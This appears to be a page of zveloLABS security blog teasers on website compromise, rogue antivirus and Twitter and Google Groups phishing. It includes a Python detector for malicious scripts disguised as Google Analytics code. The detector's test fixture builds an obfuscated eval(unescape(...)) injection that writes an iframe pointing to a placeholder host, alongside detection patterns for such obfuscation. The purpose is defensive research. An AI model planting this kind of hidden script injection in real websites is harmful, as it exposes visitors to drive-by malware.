zveloLABS™ has detected a new widespread compromise, with tens of thousands of domains infected. Cybercriminals have used stolen credentials, placing specially crafted pages into legitimate websites that lead visitors to malicious payloads.
zveloLABS™ has been tracking a new campaign in which cybercriminals compromise existing websites and create new ones for use in SEO poisoning and malware distribution. Thousands of these sites have been detected; they use elaborate techniques to manipulate search engine rankings and can begin serving malware at any moment.
Network administrators and businesses install web filtering on networks for a variety of reasons ranging from compliance and legal requirements to worker productivity issues. To gain some insight, zvelo surveyed network administrators, customers, readers, and security professionals to identify the most important drivers behind web filtering. Below are the results:
This post is for those users who are not already familiar with this widespread and common threat known as “Rogue AV,” or fake antivirus software.
The Google Analytics tracking snippet appears in HTML source so often that researchers rarely give it a second glance – until now. zveloLABS™ researchers have recently seen several compromised sites using Google Analytics code to mask malicious scripts, as in the example below.
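The masking technique described above relies on the fact that a block beginning with familiar Google Analytics boilerplate is rarely read to the end. The following detector is an added example, written for this page and not code from zveloLABS; it collects inline scripts from a page, keeps only those carrying Analytics markers (`google-analytics.com`, `_gaq`, a `UA-` account ID), and flags any such block that also contains obfuscation constructs (`eval`, `unescape`, `fromCharCode`, `document.write`, iframe creation, or long runs of `%xx`/`\xNN` escapes). The two sample pages, the `UA-XXXXXXX-1` placeholder and the `example.invalid` host are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Strings that a genuine Google Analytics snippet normally contains.
GA_MARKERS = ("google-analytics.com", "_gaq", "UA-")

# Constructs that have no place inside a tracking snippet but are common in
# injected, obfuscated code. Order matters only for the order of reasons reported.
SUSPICIOUS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"fromCharCode"),
    "document.write": re.compile(r"document\.write\s*\("),
    "iframe": re.compile(r"<\s*iframe|createElement\(\s*['\"]iframe", re.I),
    # 20 or more consecutive %xx or \xNN escapes: a payload hidden as a string.
    "long_escaped_string": re.compile(
        r"(?:%[0-9a-fA-F]{2}){20,}|(?:\\x[0-9a-fA-F]{2}){20,}"),
}


class ScriptCollector(HTMLParser):
    """Collect the body of every <script> element (empty for external scripts)."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA, so the whole body,
        # including any '<iframe' text inside JS strings, arrives here.
        if self._in_script:
            self.scripts[-1] += data


def find_suspicious_ga_blocks(html):
    """Return [(script_index, [reasons])] for scripts that look like Google
    Analytics boilerplate but also contain obfuscation constructs."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for index, body in enumerate(parser.scripts):
        if not any(marker in body for marker in GA_MARKERS):
            continue  # not an Analytics-looking block; out of scope here
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(body)]
        if reasons:
            findings.append((index, reasons))
    return findings


# Constructed sample: the classic asynchronous ga.js snippet (placeholder account ID).
GA_SNIPPET = """
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-XXXXXXX-1']);
_gaq.push(['_trackPageview']);
(function() {
  var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
  ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
"""

# Constructed injection appended after the boilerplate: eval(unescape(...)) of
# URL-encoded document.write('<iframe src="http://example.invalid/">').
INJECTED_TAIL = (
    "eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72"
    "%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%65%78%61%6d%70%6c%65%2e"
    "%69%6e%76%61%6c%69%64%2f%22%3e%27%29'));\n"
)

CLEAN_PAGE = (
    "<html><head><script src='/js/jquery.js'></script>"
    "<script type='text/javascript'>" + GA_SNIPPET + "</script></head><body></body></html>"
)
INFECTED_PAGE = (
    "<html><head><script src='/js/jquery.js'></script>"
    "<script type='text/javascript'>" + GA_SNIPPET + INJECTED_TAIL +
    "</script></head><body></body></html>"
)

if __name__ == "__main__":
    print("clean page:", find_suspicious_ga_blocks(CLEAN_PAGE))
    print("infected page:", find_suspicious_ga_blocks(INFECTED_PAGE))
```

Only the Analytics-looking block on the infected page is reported, with the reasons `eval`, `unescape` and `long_escaped_string`; the external jQuery reference (index 0) has no body and is skipped, and the untouched snippet on the clean page produces no finding. In practice the `%xx` run is then decoded and inspected, since the decoded text is where the injected iframe target appears.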
A new Twitter spam campaign is making the rounds, infecting users with rogue anti-virus malware. The spam email tries to convince the user that someone has been trying to steal their Twitter account information and that they should download a “secure module” to protect their account.
zveloLABS™ has uncovered thousands of compromised web servers hosting fake YouTube pages. Attempting to play the video on these fake pages prompts the user to install a ‘media codec’ which then infects the machine with malware.
In the security community, little attention is paid to compromised websites that don’t serve up malware. The malicious URL lists maintained by the anti-virus companies, by Google, and by nearly every other source of malicious URLs rely on anti-virus to trigger on exploits and malware to determine if a site is malicious. In a few select cases, behavioral analysis may be used to determine if a visit to a website will lead to an infected computer.
The newest phishing scam on Twitter has snared thousands of users hoping to increase their number of followers. Instead, users are sent to a phishing page where cybercriminals steal their Twitter logins and use them to generate more spam.
zveloLABS™ researchers have been tracking a recent campaign abusing Google Groups to spread malicious links in spam emails. Users who follow the link are infected with a downloader Trojan, which silently installs various types of malware, including rogue antivirus software.